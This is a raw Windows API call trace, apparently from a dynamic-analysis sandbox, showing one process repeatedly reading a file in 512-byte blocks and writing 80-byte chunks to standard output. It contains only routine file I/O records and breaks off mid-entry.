[0134.556] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.556] WriteFile (in: hFile=0x50, lpBuffer=0x1cee5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee5c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.556] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.556] GetFileType (hFile=0x50) returned 0x1 [0134.556] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.556] WriteFile (in: hFile=0x50, lpBuffer=0x1ceeac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceeac*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.556] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.556] GetFileType (hFile=0x50) returned 0x1 [0134.557] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.557] WriteFile (in: hFile=0x50, lpBuffer=0x1ceefc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceefc*, lpNumberOfBytesWritten=0x1cdf00*=0x20, lpOverlapped=0x0) returned 1 [0134.557] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.557] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdeec | out: lpNewFilePointer=0x0) returned 1 [0134.557] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.557] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.557] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.557] GetFileType (hFile=0x50) returned 0x1 [0134.557] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.557] GetFileType (hFile=0x50) returned 0x1 [0134.557] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.557] WriteFile (in: hFile=0x50, lpBuffer=0x1ced1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.557] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.557] GetFileType (hFile=0x50) returned 0x1 [0134.557] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.557] WriteFile (in: hFile=0x50, lpBuffer=0x1ced6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced6c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.557] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.557] GetFileType (hFile=0x50) returned 0x1 [0134.557] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.557] WriteFile (in: hFile=0x50, lpBuffer=0x1cedbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cedbc*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.557] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.557] GetFileType (hFile=0x50) returned 0x1 [0134.557] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.557] WriteFile (in: hFile=0x50, lpBuffer=0x1cee0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee0c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.557] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.557] GetFileType (hFile=0x50) returned 0x1 [0134.557] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.557] WriteFile (in: hFile=0x50, lpBuffer=0x1cee5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee5c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.557] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.557] GetFileType (hFile=0x50) returned 0x1 [0134.557] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.557] WriteFile (in: hFile=0x50, lpBuffer=0x1ceeac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceeac*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.557] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.557] GetFileType (hFile=0x50) returned 0x1 [0134.558] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.558] WriteFile (in: hFile=0x50, lpBuffer=0x1ceefc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceefc*, lpNumberOfBytesWritten=0x1cdf00*=0x20, lpOverlapped=0x0) returned 1 [0134.558] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.558] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdeec | out: lpNewFilePointer=0x0) returned 1 [0134.558] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.558] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.558] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.558] GetFileType (hFile=0x50) returned 0x1 [0134.558] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.558] GetFileType (hFile=0x50) returned 0x1 [0134.558] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.558] WriteFile (in: hFile=0x50, lpBuffer=0x1ced1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.558] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.558] GetFileType (hFile=0x50) returned 0x1 [0134.558] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.558] WriteFile (in: hFile=0x50, lpBuffer=0x1ced6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced6c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.558] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.558] GetFileType (hFile=0x50) returned 0x1 [0134.558] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.558] WriteFile (in: hFile=0x50, lpBuffer=0x1cedbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cedbc*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.558] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.558] GetFileType (hFile=0x50) returned 0x1 [0134.558] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.558] WriteFile (in: hFile=0x50, lpBuffer=0x1cee0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee0c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.558] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.558] GetFileType (hFile=0x50) returned 0x1 [0134.558] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.558] WriteFile (in: hFile=0x50, lpBuffer=0x1cee5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee5c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.558] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.558] GetFileType (hFile=0x50) returned 0x1 [0134.558] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.558] WriteFile (in: hFile=0x50, lpBuffer=0x1ceeac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceeac*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.558] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.558] GetFileType (hFile=0x50) returned 0x1 [0134.558] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.559] WriteFile (in: hFile=0x50, lpBuffer=0x1ceefc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceefc*, lpNumberOfBytesWritten=0x1cdf00*=0x20, lpOverlapped=0x0) returned 1 [0134.559] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.559] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdeec | out: lpNewFilePointer=0x0) returned 1 [0134.559] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.559] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.559] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.559] GetFileType (hFile=0x50) returned 0x1 [0134.559] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.559] GetFileType (hFile=0x50) returned 0x1 [0134.559] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.559] WriteFile (in: hFile=0x50, lpBuffer=0x1ced1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.559] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.559] GetFileType (hFile=0x50) returned 0x1 [0134.559] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.559] WriteFile (in: hFile=0x50, lpBuffer=0x1ced6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced6c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.559] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.559] GetFileType (hFile=0x50) returned 0x1 [0134.559] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.559] WriteFile (in: hFile=0x50, lpBuffer=0x1cedbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cedbc*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.559] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.559] GetFileType (hFile=0x50) returned 0x1 [0134.559] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.559] WriteFile (in: hFile=0x50, lpBuffer=0x1cee0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee0c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.559] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.559] GetFileType (hFile=0x50) returned 0x1 [0134.559] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.559] WriteFile (in: hFile=0x50, lpBuffer=0x1cee5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee5c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.560] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.560] GetFileType (hFile=0x50) returned 0x1 [0134.560] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.560] WriteFile (in: hFile=0x50, lpBuffer=0x1ceeac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceeac*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.560] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.560] GetFileType (hFile=0x50) returned 0x1 [0134.560] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.560] WriteFile (in: hFile=0x50, lpBuffer=0x1ceefc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceefc*, lpNumberOfBytesWritten=0x1cdf00*=0x20, lpOverlapped=0x0) returned 1 [0134.560] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.560] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdeec | out: lpNewFilePointer=0x0) returned 1 [0134.560] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.560] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.560] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.560] GetFileType (hFile=0x50) returned 0x1 [0134.560] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.560] GetFileType (hFile=0x50) returned 0x1 [0134.560] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.560] WriteFile (in: hFile=0x50, lpBuffer=0x1ced1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.560] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.560] GetFileType (hFile=0x50) returned 0x1 [0134.560] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.560] WriteFile (in: hFile=0x50, lpBuffer=0x1ced6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced6c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.560] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.560] GetFileType (hFile=0x50) returned 0x1 [0134.560] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.560] WriteFile (in: hFile=0x50, lpBuffer=0x1cedbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cedbc*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.560] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.560] GetFileType (hFile=0x50) returned 0x1 [0134.560] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.560] WriteFile (in: hFile=0x50, lpBuffer=0x1cee0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee0c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.560] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.560] GetFileType (hFile=0x50) returned 0x1 [0134.560] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.560] WriteFile (in: hFile=0x50, lpBuffer=0x1cee5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee5c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.561] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.561] GetFileType (hFile=0x50) returned 0x1 [0134.561] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.561] WriteFile (in: hFile=0x50, lpBuffer=0x1ceeac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceeac*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.561] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.561] GetFileType (hFile=0x50) returned 0x1 [0134.561] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.561] WriteFile (in: hFile=0x50, lpBuffer=0x1ceefc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceefc*, lpNumberOfBytesWritten=0x1cdf00*=0x20, lpOverlapped=0x0) returned 1 [0134.561] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.561] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdeec | out: lpNewFilePointer=0x0) returned 1 [0134.561] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.561] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.561] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.561] GetFileType (hFile=0x50) returned 0x1 [0134.561] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.561] GetFileType (hFile=0x50) returned 0x1 [0134.561] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.561] WriteFile (in: hFile=0x50, lpBuffer=0x1ced1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.561] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.561] GetFileType (hFile=0x50) returned 0x1 [0134.561] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.561] WriteFile (in: hFile=0x50, lpBuffer=0x1ced6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced6c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.561] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.561] GetFileType (hFile=0x50) returned 0x1 [0134.561] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.561] WriteFile (in: hFile=0x50, lpBuffer=0x1cedbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cedbc*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.561] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.561] GetFileType (hFile=0x50) returned 0x1 [0134.561] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.561] WriteFile (in: hFile=0x50, lpBuffer=0x1cee0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee0c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.561] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.561] GetFileType (hFile=0x50) returned 0x1 [0134.561] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.561] WriteFile (in: hFile=0x50, lpBuffer=0x1cee5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee5c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.562] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.562] GetFileType (hFile=0x50) returned 0x1 [0134.562] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.562] WriteFile (in: hFile=0x50, lpBuffer=0x1ceeac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceeac*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.562] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.562] GetFileType (hFile=0x50) returned 0x1 [0134.562] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.562] WriteFile (in: hFile=0x50, lpBuffer=0x1ceefc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceefc*, lpNumberOfBytesWritten=0x1cdf00*=0x20, lpOverlapped=0x0) returned 1 [0134.562] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.562] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdeec | out: lpNewFilePointer=0x0) returned 1 [0134.562] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.562] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.562] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.562] GetFileType (hFile=0x50) returned 0x1 [0134.562] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.562] GetFileType (hFile=0x50) returned 0x1 [0134.562] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.562] WriteFile (in: hFile=0x50, lpBuffer=0x1ced1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.562] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.562] GetFileType (hFile=0x50) returned 0x1 [0134.562] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.562] WriteFile (in: hFile=0x50, lpBuffer=0x1ced6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced6c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.562] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.562] GetFileType (hFile=0x50) returned 0x1 [0134.562] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.562] WriteFile (in: hFile=0x50, lpBuffer=0x1cedbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cedbc*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.562] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.562] GetFileType (hFile=0x50) returned 0x1 [0134.562] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.562] WriteFile (in: hFile=0x50, lpBuffer=0x1cee0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee0c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.562] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.562] GetFileType (hFile=0x50) returned 0x1 [0134.562] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.562] WriteFile (in: hFile=0x50, lpBuffer=0x1cee5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee5c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.563] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.563] GetFileType (hFile=0x50) returned 0x1 [0134.563] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.563] WriteFile (in: hFile=0x50, lpBuffer=0x1ceeac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceeac*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.563] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.563] GetFileType (hFile=0x50) returned 0x1 [0134.563] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.563] WriteFile (in: hFile=0x50, lpBuffer=0x1ceefc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceefc*, lpNumberOfBytesWritten=0x1cdf00*=0x20, lpOverlapped=0x0) returned 1 [0134.563] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.563] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdeec | out: lpNewFilePointer=0x0) returned 1 [0134.563] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.563] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.563] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.563] GetFileType (hFile=0x50) returned 0x1 [0134.563] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.563] GetFileType (hFile=0x50) returned 0x1 [0134.563] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.563] WriteFile (in: hFile=0x50, lpBuffer=0x1ced1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.563] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.563] GetFileType (hFile=0x50) returned 0x1 [0134.563] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.563] WriteFile (in: hFile=0x50, lpBuffer=0x1ced6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced6c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.563] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.563] GetFileType (hFile=0x50) returned 0x1 [0134.563] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.563] WriteFile (in: hFile=0x50, lpBuffer=0x1cedbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cedbc*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.563] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.563] GetFileType (hFile=0x50) returned 0x1 [0134.563] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.563] WriteFile (in: hFile=0x50, lpBuffer=0x1cee0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee0c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.563] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.563] GetFileType (hFile=0x50) returned 0x1 [0134.563] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.563] WriteFile (in: hFile=0x50, lpBuffer=0x1cee5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee5c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.563] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.564] GetFileType (hFile=0x50) returned 0x1 [0134.564] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.564] WriteFile (in: hFile=0x50, lpBuffer=0x1ceeac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceeac*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.564] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.564] GetFileType (hFile=0x50) returned 0x1 [0134.564] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.564] WriteFile (in: hFile=0x50, lpBuffer=0x1ceefc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | 